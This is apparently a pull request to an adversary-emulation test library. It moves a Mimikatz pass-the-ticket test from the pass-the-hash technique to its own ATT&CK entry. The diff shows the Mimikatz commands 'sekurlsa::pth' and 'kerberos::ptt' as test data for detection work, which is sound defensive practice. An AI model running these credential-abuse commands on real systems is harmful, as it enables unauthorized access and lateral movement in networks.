### PR TITLE
T1097 - Move PTT atomic test to appropriate technique

### DIFF
--- a/atomics/T1075/T1075.md
+++ b/atomics/T1075/T1075.md
@@ -8,8 +8,6 @@ Windows 7 and higher with KB2871997 require valid domain user credentials or RID
 
 - [Atomic Test #1 - Mimikatz Pass the Hash](#atomic-test-1---mimikatz-pass-the-hash)
 
-- [Atomic Test #2 - Mimikatz Kerberos Ticket Attack](#atomic-test-2---mimikatz-kerberos-ticket-attack)
-
 
 <br/>
 
@@ -30,24 +28,5 @@ Note: must dump hashes first
 #### Run it with `command_prompt`!
 ```
 mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
-```
-<br/>
-<br/>
-
-## Atomic Test #2 - Mimikatz Kerberos Ticket Attack
-Similar to PTH, but attacking Kerberos
-
-**Supported Platforms:** Windows
-
-
-#### Inputs
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user_name | username | string | Administrator|
-| domain | domain | string | atomic.local|
-
-#### Run it with `command_prompt`!
-```
-mimikatz # kerberos::ptt #{user_name}@#{domain}
 ```
 <br/>

--- a/atomics/T1075/T1075.yaml
+++ b/atomics/T1075/T1075.yaml
@@ -29,25 +29,3 @@ atomic_tests:
     name: command_prompt
     command: |
       mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
-
-- name: Mimikatz Kerberos Ticket Attack
-  description: |
-    Similar to PTH, but attacking Kerberos
-
-  supported_platforms:
-    - windows
-
-  input_arguments:
-    user_name:
-      description: username
-      type: string
-      default: Administrator
-    domain:
-      description: domain
-      type: string
-      default: atomic.local
-
-  executor:
-    name: command_prompt
-    command: |
-      mimikatz # kerberos::ptt #{user_name}@#{domain}

--- a/atomics/T1097/T1097.md
+++ b/atomics/T1097/T1097.md
@@ -1,0 +1,34 @@
+# T1097 - Pass the Ticket
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1097)
+<blockquote>Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
+
+In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)
+
+Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)
+
+Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Mimikatz Kerberos Ticket Attack](#atomic-test-1---mimikatz-kerberos-ticket-attack)
+
+
+<br/>
+
+## Atomic Test #1 - Mimikatz Kerberos Ticket Attack
+Similar to PTH, but attacking Kerberos
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| user_name | username | string | Administrator|
+| domain | domain | string | atomic.local|
+
+#### Run it with `command_prompt`!
+```
+mimikatz # kerberos::ptt #{user_name}@#{domain}
+```
+<br/>

--- a/atomics/T1097/T1097.yaml
+++ b/atomics/T1097/T1097.yaml
@@ -1,0 +1,26 @@
+---
+attack_technique: T1097
+display_name: Pass the Ticket
+
+atomic_tests:
+- name: Mimikatz Kerberos Ticket Attack
+  description: |
+    Similar to PTH, but attacking Kerberos
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    user_name:
+      description: username
+      type: string
+      default: Administrator
+    domain:
+      description: domain
+      type: string
+      default: atomic.local
+
+  executor:
+    name: command_prompt
+    command: |
+      mimikatz # kerberos::ptt #{user_name}@#{domain}


### PR DESCRIPTION
**Details:**
Currently, there are two atomic tests for T1075. Although the tests are similar in nature, the second test, "Mimikatz Kerberos Ticket Attack", is actually an example of the Pass the Ticket technique, which has its own TID (T1097). Change here adds no new test, but rather moves "Mimikatz Kerberos Ticket Attack" to T1097.

**Testing:**
No testing done per se, since this is a pre-existing test that is working correctly. The impetus for this change was discovered by automated testing, which identified the "Mimikatz Kerberos Ticket Attack" test as T1097 but not T1075.

**Associated Issues:**
None